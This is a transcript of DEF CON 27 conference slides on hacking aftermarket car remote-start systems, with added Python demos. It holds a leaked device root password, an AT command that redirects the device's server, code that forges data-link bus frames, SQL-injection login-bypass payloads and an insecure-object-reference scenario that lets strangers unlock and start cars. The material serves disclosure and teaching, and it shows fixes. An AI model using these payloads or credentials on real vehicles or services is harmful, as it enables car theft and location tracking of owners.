Your Car Is My Car (DEF CON 27, Jmaxxz)
About me
● Software Engineer by trade
● Hacker by passion
● Lock picker for fun
● The best puzzles are not meant to be solved
● All opinions are my own, and may not reflect those of my past, present, or future employers
● Twitter: @Jmaxxz
Backstory
Image source: https://commons.wikimedia.org/wiki/File:Raynauld.jpg
Traditional car ignitions
● Lock + Switch
Image source: https://www.autozone.com/batteries-starting-and-charging/ignition-switch/duralast-ignition-switch/342354_0
"Modern" Car Ignitions
● Lock + Electronic Lock + Switch
"Data-link" bus
5 V UART, 9600 baud
0C 0E 03 32 03 FF FF F1 35 0D
Fields as annotated on the slide: start sentinel (0C) and end sentinel (0D), with direction (i.e. garbage), command, length, payload (address) and checksum in between.
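An added example, mine rather than code from the deck or from the OpenRemoteStart firmware, that parses and rebuilds the frame above. The slide names the fields but does not say which byte is which; the layout in the code is my inference, chosen because it makes the length byte match the three-byte payload and because the byte before the end sentinel equals the low byte of the sum of everything between the sentinels (0x0E+0x03+0x32+0x03+0xFF+0xFF+0xF1 = 0x335, low byte 0x35). Treating the two bytes after the start sentinel as a single "direction" header is likewise an assumption.

```python
"""Parse and build frames in the format shown on the slide (added example)."""

START, END = 0x0C, 0x0D  # start / end sentinel, as labelled on the slide
SLIDE_FRAME = bytes.fromhex("0C0E033203FFFFF1350D")  # the frame printed on the slide


def checksum(body: bytes) -> int:
    """Additive checksum: sum of every byte between the sentinels (checksum excluded), mod 256."""
    return sum(body) & 0xFF


def parse_frame(frame: bytes) -> dict:
    """Validate sentinels, length and checksum, then return the decoded fields.

    Assumed layout (my inference, not stated on the slide):
        START | header(2) | command | length | payload[length] | checksum | END
    The slide labels the header bytes "direction (i.e. garbage)".
    """
    if len(frame) < 7:
        raise ValueError("frame too short")
    if frame[0] != START or frame[-1] != END:
        raise ValueError("missing start/end sentinel")
    body, chk = frame[1:-2], frame[-2]
    if checksum(body) != chk:
        raise ValueError(f"bad checksum {chk:02X}, expected {checksum(body):02X}")
    header, command, length, payload = body[:2], body[2], body[3], body[4:]
    if len(payload) != length:
        raise ValueError(f"length field {length} does not match payload size {len(payload)}")
    return {"header": header, "command": command, "length": length,
            "payload": payload, "checksum": chk}


def is_valid(frame: bytes) -> bool:
    """True if parse_frame() accepts the frame."""
    try:
        parse_frame(frame)
        return True
    except ValueError:
        return False


def build_frame(command: int, payload: bytes, header: bytes = b"\x0e\x03") -> bytes:
    """Build a frame the parser accepts; the default header is copied from the slide frame."""
    body = bytes(header) + bytes([command & 0xFF, len(payload)]) + bytes(payload)
    return bytes([START]) + body + bytes([checksum(body), END])


def roundtrip_slide_frame() -> bool:
    """True if the slide's frame parses and re-serialises byte for byte."""
    f = parse_frame(SLIDE_FRAME)
    return build_frame(f["command"], f["payload"], f["header"]) == SLIDE_FRAME


if __name__ == "__main__":
    fields = parse_frame(SLIDE_FRAME)
    print({k: (v.hex() if isinstance(v, bytes) else f"0x{v:02X}") for k, v in fields.items()})
    # A frame carrying a different payload passes the same check: the checksum
    # catches line noise, it does not tell the receiver who put the frame on the bus.
    print(build_frame(0x32, bytes.fromhex("FFFFF2")).hex())
```

Because the only integrity check is an additive checksum, any frame with a correct sum is accepted. That is what lets a device attached to the bus, such as the Particle firmware below, talk to the remote-start module at all, and equally what means the bus has no way to distinguish the installed module from anything else wired to it.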
Demos
Particle.io firmware can be found at:
https://github.com/jmaxxz/OpenRemoteStart
MyCar (Cellular Remote)
MyCar AKA
● Linkr-LT1
● MyCar Kia
● Visions MyCar
● Carlink (CL6)
How does this happen?
[Board photo: UART RX and TX pads]
Tips for using the UART
● 3.3 V, 115200 baud UART
● Change server
AT+XIP="173.27.224.18",46033
● root password is oelinux123
● https://fccid.io/2AEB4AG21/User-Manual/User-manual-3104674
[Board photo: UART RX and TX pads]
Demo
Example Vectors
Untargeted (admin)
UserName: API
Password: f") OR "1"<>"1
Targeted
UserName: example@example.com" OR ("1"<>"1
Password: a") OR "1"<>"1
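An added example, not from the deck, running the targeted vector above against a login query of an assumed shape, in Python with SQLite. The deck shows only the payloads, not the query it was used against; the WHERE clause here is my guess, chosen because the targeted username and password pair balances its parentheses (the untargeted "API" vector carries one more ")" than "(" and so implies a query shape the deck does not show, which is why it is not reproduced). The accounts are constructed, and double-quoted strings parse as literals in SQLite only through its legacy fallback, which mirrors MySQL's default behaviour.

```python
"""The targeted login bypass from the slide against an assumed query (added example)."""
import sqlite3

TARGETED_USER = 'example@example.com" OR ("1"<>"1'  # username field, as on the slide
TARGETED_PASS = 'a") OR "1"<>"1'                     # password field, as on the slide


def make_db() -> sqlite3.Connection:
    """Constructed sample accounts; nothing here comes from the real service."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("API", "service-secret", "admin"),
        ("example@example.com", "hunter2", "owner"),
        ("other@example.net", "letmein", "owner"),
    ])
    return db


def assemble(username: str, password: str) -> str:
    """The assumed vulnerable query: values pasted into double-quoted literals.

    Assumption: the deck does not show the query. With the slide's payloads this becomes
    WHERE (email="example@example.com" OR ("1"<>"1" AND password="a") OR "1"<>"1")
    i.e. the password check is wrapped in a branch that is always false.
    """
    return (f'SELECT email, role FROM users '
            f'WHERE (email="{username}" AND password="{password}")')


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> list:
    return db.execute(assemble(username, password)).fetchall()


def login_fixed(db: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with bound parameters: payloads are compared as data, never parsed as SQL."""
    sql = "SELECT email, role FROM users WHERE (email=? AND password=?)"
    return db.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(assemble(TARGETED_USER, TARGETED_PASS))
    print("vulnerable:", login_vulnerable(db, TARGETED_USER, TARGETED_PASS))
    print("fixed:     ", login_fixed(db, TARGETED_USER, TARGETED_PASS))
```

The vulnerable path returns the named account without its password; the parameterised path returns nothing, because the whole payload is now just an email address that does not exist.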
Remote Starting a Car
Demo
Getting Command Status
No Direct Object Reference?
Duplicate Information
● USER_EMAIL ≈ ACCOUNT_ID
Duplicate Info Can Lead to Bugs
// Case 1
if(USER_EMAIL owns DEVICE_ID){
DoCommand();
}
// Case 2
if(ACCOUNT_ID owns DEVICE_ID){
DoCommand();
}
// Case 3
if(USER_EMAIL owns ACCOUNT_ID) {
DoCommand();
}
// Case 4
if(USER_EMAIL owns ACCOUNT_ID AND
ACCOUNT_ID owns DEVICE_ID){
DoCommand();
}
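An added example, mine and not the MyCar service code, that runs the four checks above over a constructed account/device table while an attacker (Bob, logged in as himself) submits requests aimed at Alice's device. The deck does not say which of the four cases the service implemented; the identifiers, ownership data and request fields here are made up.

```python
"""Which of the four ownership checks actually binds the caller to the device (added example)."""
from dataclasses import dataclass

# Constructed tenancy data (not from the service): account -> owning user, device -> owning account.
ACCOUNT_OWNER = {"acct-1": "alice@example.com", "acct-2": "bob@example.com"}
DEVICE_ACCOUNT = {"dev-A": "acct-1", "dev-B": "acct-2"}


@dataclass(frozen=True)
class Request:
    user_email: str   # authenticated principal, taken from the session
    account_id: str   # client-supplied and redundant with user_email
    device_id: str    # client-supplied; the object the command acts on


def user_owns_account(email: str, account_id: str) -> bool:
    return ACCOUNT_OWNER.get(account_id) == email


def account_owns_device(account_id: str, device_id: str) -> bool:
    return DEVICE_ACCOUNT.get(device_id) == account_id


def user_owns_device(email: str, device_id: str) -> bool:
    # Walk the real chain: device -> its account -> that account's owner.
    return user_owns_account(email, DEVICE_ACCOUNT.get(device_id))


def authorize(case: int, r: Request) -> bool:
    """The four checks from the slide, numbered as there."""
    if case == 1:
        return user_owns_device(r.user_email, r.device_id)
    if case == 2:
        return account_owns_device(r.account_id, r.device_id)
    if case == 3:
        return user_owns_account(r.user_email, r.account_id)
    if case == 4:
        return (user_owns_account(r.user_email, r.account_id)
                and account_owns_device(r.account_id, r.device_id))
    raise ValueError(f"unknown case {case}")


def attacker_requests() -> dict:
    """Bob, logged in as himself, tries to command Alice's device dev-A two ways."""
    return {
        "forged account id": Request("bob@example.com", "acct-1", "dev-A"),
        "own account, foreign device": Request("bob@example.com", "acct-2", "dev-A"),
    }


def leaking_cases() -> dict:
    """For each attacker request, the cases that would let DoCommand() run."""
    return {name: [c for c in (1, 2, 3, 4) if authorize(c, req)]
            for name, req in attacker_requests().items()}


if __name__ == "__main__":
    for name, cases in leaking_cases().items():
        print(f"{name}: allowed by case(s) {cases}")
```

Case 2 trusts the client-supplied account id and never ties it to the logged-in user; case 3 ties the user to the account but never the account to the device. Cases 1 and 4 both reach the device through the caller, and case 1 is only complete if nothing downstream (command status, audit records) trusts the unchecked account id.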
Direct Object Reference
An attacker could Remotely
● Locate car
● Unlock car
● Start car
● Lock car
● Trigger alarm
● Edit car
● Check the status of any command
MyCar's Fix For Hardcoded Password
Old:
New:
Reverse Proxies Don't Fix Everything
MyCar shows your car's current location
But…
And track the most common places you visit
Unlike public cloud environments that battle for priority, Procon Analytics use virtual private cloud that supports only our customers and applications with no interference from other users. This dedicated, highly secure environment ensures higher availability and faster delivery of service.
...
When you partner with Procon Analytics, you can be assured that your data is secure and protected.
How does this happen?
How do we stop it?
Sources + Misc links
● https://fortin.ca/en/evo-one.html [Evo One page on Fortin website]
● https://commons.wikimedia.org/wiki/File:Raynauld.jpg [image of hand with Raynaud's]
● http://www.lescodistributing.com/1117_Omega.pdf [image of LINKR-LT1 ad]
● https://www.autozone.com/batteries-starting-and-charging/ignition-switch/duralast-ignition-switch/342354_0 [ignition switch]
● https://cdn02.fortin.ca/download/57211/evo-one_ig_tha_bi_sub1-forester-wrx-sti-2015_key_b_57211.pdf [Fortin Evo One install manual, Subaru Impreza 2012]
● https://fortin.ca/download/64631/omega-linkr-lt1-install-guide-64631.pdf [Omega LINKR-LT1 install guide]
● https://www.chicagotribune.com/suburbs/lake-county-news-sun/ct-keyless-ignition-risk-met-20150618-story.html [remote-started car almost kills couple, CO poisoning]
● https://www.youtube.com/watch?v=6kwQtugSZ9g [Mustang accident, remote starter]
● https://www.youtube.com/watch?v=j6Wntha7ft8 [Top 3 Ways Thieves Steal Cars]
● https://www.youtube.com/watch?v=2v5dNCR7NJ4 [Gone in Under 60 seconds... Auto/Truck Theft]
● https://fortin.ca/en/qa/87632/can-get-datalink-protocol-and-technical-specs-if-looking-develop-remote-start-interface-device
● http://phillipsind.com/media_relations/press_releases/1273
● http://connected-holdings.com/portfolio_page
● https://proconanalytics.com/
● https://en.wikipedia.org/wiki/The_Market_for_Lemons
● https://www.iii.org/fact-statistic/facts-statistics-auto-theft [car theft data for the USA]
● Thanks to Twitter: @lizzymcfarland [for proofreading my bio and abstract]
